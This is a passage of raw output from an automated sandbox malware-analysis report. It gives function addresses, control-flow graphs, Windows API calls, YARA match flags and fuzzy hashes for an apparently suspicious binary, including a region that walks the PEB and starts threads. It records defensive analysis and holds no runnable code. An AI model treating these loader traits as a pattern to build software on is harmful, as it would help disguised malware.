                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$ProtectSection$View$AllocCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2664363762-0
                                                                                                                        • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                        • Instruction ID: 724f3ac0e114b60bf0c73e3f360bd0cf5b2cb7430d5fd6277dd5179061506953
                                                                                                                        • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                        • Instruction Fuzzy Hash: 8F425B72608341AFDB24CF64C848B6BBBE9FF88714F14492DF9859B251E770E944CBA1
                                                                                                                        Function 008E7610 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 405COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1255 8e7610-8e762e 1256 8e7816-8e7817 1255->1256 1257 8e7634-8e763e 1255->1257 1263 8e781e-8e7827 call 8e4ff0 1256->1263 1258 8e7644-8e7651 1257->1258 1259 8e77e2 1257->1259 1261 8e7b87-8e7b88 1258->1261 1262 8e7657-8e7666 1258->1262 1260 8e77e4-8e77ee 1259->1260 1260->1260 1264 8e77f0-8e77f8 1260->1264 1267 8e7b8a-8e7b8e 1261->1267 1265 8e766e-8e769c 1262->1265 1266 8e7668-8e766b 1262->1266 1276 8e782e-8e784e TryAcquireSRWLockExclusive 1263->1276 1269 8e780a 1264->1269 1270 8e77fa call 8e9c60 1264->1270 1271 8e769e-8e76b2 1265->1271 1272 8e76b4-8e76c1 1265->1272 1266->1265 1274 8e7b94-8e7b9a ReleaseSRWLockExclusive 1267->1274 1269->1256 1278 8e77ff-8e7804 1270->1278 1271->1272 1272->1276 1277 8e76c7-8e76dd 1272->1277 1281 8e7ba1-8e7ba4 1274->1281 1282 8e7857-8e7871 1276->1282 1283 8e7850-8e7852 call 8e6680 1276->1283 1279 8e76df call 9001c4 1277->1279 1280 8e76e4-8e76fc 1277->1280 1278->1269 1279->1280 1280->1263 1288 8e7702-8e7705 1280->1288 1286 8e7ad4-8e7ada 1281->1286 1284 8e7a99-8e7aaf call 8f51c0 1282->1284 1285 8e7877-8e7894 1282->1285 1283->1282 1296 8e7ab4-8e7aba 1284->1296 1291 8e791c-8e791e 1285->1291 1292 8e789a-8e78ac 1285->1292 1297 8e7ae2-8e7b03 call 8f51c0 1286->1297 1288->1276 1293 8e770b-8e771d 1288->1293 1298 8e78c3-8e7913 ReleaseSRWLockExclusive 1291->1298 1294 8e7b2d-8e7b55 call 8e45d0 call 831780 call 8f67b0 1292->1294 1295 8e78b2-8e78ba 1292->1295 1299 8e7946-8e7952 1293->1299 1300 8e7723-8e7729 1293->1300 1335 8e7b5a-8e7b82 call 8e45d0 call 831780 call 8f67b0 1294->1335 1295->1294 1303 8e78c0 1295->1303 1301 8e7b90 1296->1301 1302 8e7ac0-8e7ac8 1296->1302 1297->1267 1320 8e7b09-8e7b13 1297->1320 1298->1291 1305 8e7956-8e7977 TryAcquireSRWLockExclusive 1299->1305 1307 8e772f-8e7733 1300->1307 1308 8e7920-8e793e call 8e6130 1300->1308 1301->1274 1302->1281 1311 8e7ace-8e7ad1 1302->1311 1303->1298 1314 8e7979-8e797d call 8e6680 1305->1314 1315 8e7982-8e799c 1305->1315 1310 8e7737-8e7740 1307->1310 1308->1310 1330 8e7944 1308->1330 1317 8e77db-8e77dd 1310->1317 1318 8e7746-8e7750 1310->1318 1311->1286 1314->1315 1315->1297 1319 8e79a2-8e79bf 1315->1319 1331 8e7759-8e7784 1317->1331 1324 8e7a6f-8e7a94 call 8e45d0 call 831780 call 8f67b0 1318->1324 1325 8e7756 1318->1325 1326 8e7a4b-8e7a4d 1319->1326 1327 8e79c5-8e79d7 1319->1327 1328 8e7ba9-8e7bac 1320->1328 1329 8e7b19-8e7b1c 1320->1329 1324->1284 1325->1331 1338 8e79ee-8e7a42 ReleaseSRWLockExclusive 1326->1338 1334 8e79dd-8e79e5 1327->1334 1327->1335 1332 8e7b1f-8e7b25 1328->1332 1329->1332 1330->1305 1336 8e7796-8e779a 1331->1336 1337 8e7786-8e7793 call 903a90 1331->1337 1332->1294 1334->1335 1342 8e79eb 1334->1342 1335->1261 1343 8e779c-8e77a2 1336->1343 1344 8e77d7-8e77d9 1336->1344 1337->1336 1338->1326 1342->1338 1348 8e7a4f-8e7a65 1343->1348 1349 8e77a8-8e77bc 1343->1349 1351 8e77c2-8e77d6 call 900685 1344->1351 1348->1324 1349->1351
                                                                                                                        APIs
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 008E7B94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLockRelease
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 1766480654-2456940119
                                                                                                                        • Opcode ID: a84a8974e483c0f265fe890a463a2bbb60113d7390a06b50f6217a4d981121df
                                                                                                                        • Instruction ID: 08e708dfd9ce5e7a18388e4d685340940bef4c3b72d6d0ae1fce955ea1b5229e
                                                                                                                        • Opcode Fuzzy Hash: a84a8974e483c0f265fe890a463a2bbb60113d7390a06b50f6217a4d981121df
                                                                                                                        • Instruction Fuzzy Hash: 47F1E2716083819FDB18CF29C884B2AB7E2FFC5318F19856CE9598B296DB30DC45DB81
                                                                                                                        Function 008F87E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1359 8f87e0-8f87f3 1360 8f8807-8f880e 1359->1360 1361 8f87f5-8f8801 1359->1361 1362 8f883d-8f883f 1360->1362 1363 8f8810-8f8824 LoadLibraryW 1360->1363 1366 8f8803-8f8806 1361->1366 1379 8f884f-8f8850 1361->1379 1362->1366 1367 8f8841-8f884a call 931d68 1362->1367 1364 8f8826-8f883b GetProcAddress 1363->1364 1365 8f8852-8f8871 TryAcquireSRWLockExclusive 1363->1365 1364->1361 1364->1362 1372 8f887d-8f8884 1365->1372 1373 8f8873-8f8878 call 8e6680 1365->1373 1367->1366 1375 8f884c-8f884d 1367->1375 1377 8f8897-8f88b2 call 8f8710 ReleaseSRWLockExclusive 1372->1377 1378 8f8886-8f888b call 8f8690 1372->1378 1373->1372 1375->1379 1383 8f8890 1378->1383 1379->1365 1383->1377
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(bcryptprimitives.dll,00973F58,?,?,008F86C5,?,00000008,008F8789,?,?,008F632D,?,00000000,00000000,?,?), ref: 008F881C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 008F882C
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00973F50,?,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8869
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00973F50,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F88A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireAddressLibraryLoadProcRelease
                                                                                                                        • String ID: ProcessPrng$bcryptprimitives.dll
                                                                                                                        • API String ID: 969684755-2667675608
                                                                                                                        • Opcode ID: db887bd1ecb76b79b92d7d71cf75e107b9dc149ea2956233fe9da44fd11e25a4
                                                                                                                        • Instruction ID: 2c555b5a0658c30ca87696b0a8fc9a967fe26b88723c0fc0d99fd66428f86875
                                                                                                                        • Opcode Fuzzy Hash: db887bd1ecb76b79b92d7d71cf75e107b9dc149ea2956233fe9da44fd11e25a4
                                                                                                                        • Instruction Fuzzy Hash: 3311B922A24349AAEF242B76AC047763B65EB857D5F448468FB0CC3691DF118940B762
                                                                                                                        Function 0594049B Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 399threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1442 594049b-5940603 call 5940a4b call 594104b call 59411fb call 5940deb 1451 5940a34-5940a37 1442->1451 1452 5940609-5940610 1442->1452 1453 594061b-594061f 1452->1453 1454 5940641-59406bc GetPEB 1453->1454 1455 5940621-594063f call 5940f6b 1453->1455 1456 59406c7-59406cb 1454->1456 1455->1453 1458 59406e3-59406f5 call 5940bab 1456->1458 1459 59406cd-59406e1 1456->1459 1465 59406f7-594071d 1458->1465 1466 594071f-5940740 CreateThread 1458->1466 1459->1456 1467 5940743-5940747 1465->1467 1466->1467 1469 594074d-5940780 call 59410ab 1467->1469 1470 5940a08-5940a2b 1467->1470 1469->1470 1474 5940786-59407d5 1469->1474 1470->1451 1476 59407e0-59407e6 1474->1476 1477 594082e-5940832 1476->1477 1478 59407e8-59407ee 1476->1478 1481 5940900-59409f3 call 5940bab call 5940a4b call 594104b 1477->1481 1482 5940838-5940845 1477->1482 1479 59407f0-59407ff 1478->1479 1480 5940801-5940805 1478->1480 1479->1480 1483 5940807-5940815 1480->1483 1484 594082c 1480->1484 1508 59409f5 1481->1508 1509 59409f8-5940a02 1481->1509 1485 5940850-5940856 1482->1485 1483->1484 1486 5940817-5940829 1483->1486 1484->1476 1489 5940886-5940889 1485->1489 1490 5940858-5940866 1485->1490 1486->1484 1491 594088c-5940893 1489->1491 1493 5940884 1490->1493 1494 5940868-5940877 1490->1494 1491->1481 1497 5940895-594089e 1491->1497 1493->1485 1494->1493 1495 5940879-5940882 1494->1495 1495->1489 1497->1481 1499 59408a0-59408b0 1497->1499 1502 59408bb-59408c7 1499->1502 1504 59408f8-59408fe 1502->1504 1505 59408c9-59408f6 1502->1505 1504->1491 1505->1502 1508->1509 1509->1470
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0594073E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID: Y`l=
                                                                                                                        • API String ID: 2422867632-1320565934
                                                                                                                        • Opcode ID: 4fa86a32f461900fe5a586c705bebe6e681269ae3503cb6bb8ff6d4332578549
                                                                                                                        • Instruction ID: 55e904494f2d6d03d2a0cd1a941ccc1b12ac8189bb661377e4da73586f9106e7
                                                                                                                        • Opcode Fuzzy Hash: 4fa86a32f461900fe5a586c705bebe6e681269ae3503cb6bb8ff6d4332578549
                                                                                                                        • Instruction Fuzzy Hash: CB12C3B5E00219DBDB14CF98C994BADBBB2FF88304F2482A9D515AB385C7356E41CF94
                                                                                                                        Function 05940A5B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1510 5940a5b-5940ab2 GetPEB 1511 5940abd-5940ac1 1510->1511 1512 5940ac7-5940ad2 1511->1512 1513 5940b61-5940b68 1511->1513 1515 5940b5c 1512->1515 1516 5940ad8-5940aef 1512->1516 1514 5940b73-5940b77 1513->1514 1518 5940b88-5940b8f 1514->1518 1519 5940b79-5940b86 1514->1519 1515->1511 1520 5940b14-5940b2c CreateThread 1516->1520 1521 5940af1-5940b12 1516->1521 1523 5940b91-5940b93 1518->1523 1524 5940b98-5940b9d 1518->1524 1519->1514 1525 5940b30-5940b38 1520->1525 1521->1525 1523->1524 1525->1515 1527 5940b3a-5940b57 1525->1527 1527->1515
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 05940B27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID: ,
                                                                                                                        • API String ID: 2422867632-3772416878
                                                                                                                        • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                        • Instruction ID: 852276100dd12e9569efa234f1324dd6a790f00f93b0041b94faa4eacc633901
                                                                                                                        • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                        • Instruction Fuzzy Hash: 2C41B674A00209EFDB04CF98C994FAEB7B5BF48314F208598D5156B391D775AE41CF98
                                                                                                                        Function 00875190 Relevance: 1.5, APIs: 1, Instructions: 275memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 4e6da48fdab385af7ad697bef644dd589734f6bef6d5b4f121b090722ff63d73
                                                                                                                        • Instruction ID: 64ebccf535d4c7ba8ab6d8eef7fac9b10ef74eaf07090143b8f1447718d65c2d
                                                                                                                        • Opcode Fuzzy Hash: 4e6da48fdab385af7ad697bef644dd589734f6bef6d5b4f121b090722ff63d73
                                                                                                                        • Instruction Fuzzy Hash: AA8106BBD787244BA348EF3AAC5606A3272FBC0750341D52EE40BC7566CF3446867A87
                                                                                                                        Function 00875590 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008758D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
                                                                                                                        • API String ID: 0-1450471538
                                                                                                                        • Opcode ID: c713178dea2bbc94ad85d39c6f82146899f3fc2ba597fb479d0152083a680c96
                                                                                                                        • Instruction ID: 45ba0b302130d3052515e737a63dc77933c0778eccbaed58dd3bb339c5ad97be
                                                                                                                        • Opcode Fuzzy Hash: c713178dea2bbc94ad85d39c6f82146899f3fc2ba597fb479d0152083a680c96
                                                                                                                        • Instruction Fuzzy Hash: F7716B73D243244FA318EF7AAC4615A3532FBC0344786D13EE90ACB556DF714A82A6C2
                                                                                                                        Function 008753C0 Relevance: 1.4, APIs: 1, Instructions: 115memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 4a9db68ff3e791a548ac605e800859f0044178245034f92c99e573540c35d6fd
                                                                                                                        • Instruction ID: 07cc37fb4dfa36f9675dd4d07b7f9051047f7db21bf75d85a5600a0935afec5a
                                                                                                                        • Opcode Fuzzy Hash: 4a9db68ff3e791a548ac605e800859f0044178245034f92c99e573540c35d6fd
                                                                                                                        • Instruction Fuzzy Hash: B3313677E683218FA74CEF39AC1655E3672FB85780341C11ED45B8B566CF340286BA86
                                                                                                                        Function 00875540 Relevance: .3, Instructions: 269COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cb02173e4676d103eeec04b9601bbd3d17104dce51441f726fb763a7b0372bea
                                                                                                                        • Instruction ID: d71873ad8d3d158bb0a54ca09e2f2d32b5b92a10645f9143aff337e748b2c2c4
                                                                                                                        • Opcode Fuzzy Hash: cb02173e4676d103eeec04b9601bbd3d17104dce51441f726fb763a7b0372bea
                                                                                                                        • Instruction Fuzzy Hash: 33816A73D643254FE358EF7AAC4615A3672FBC0344785C13EE94ACB456DF304A82A6C2
                                                                                                                        Function 008F5FB0 Relevance: 37.7, APIs: 30, Instructions: 173sleepmemoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,00000000,?,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000), ref: 008F5FCA
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F5FE7
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6005
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6013
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6022
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F603C
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F604A
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6054
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F606E
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F607C
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6086
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60A4
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60B2
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60C0
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60DE
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60EC
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60FA
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6118
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6126
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6134
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6152
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6160
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F616E
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F618C
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F619A
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F61A8
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F61C6
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F61D4
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F61E2
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6200
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
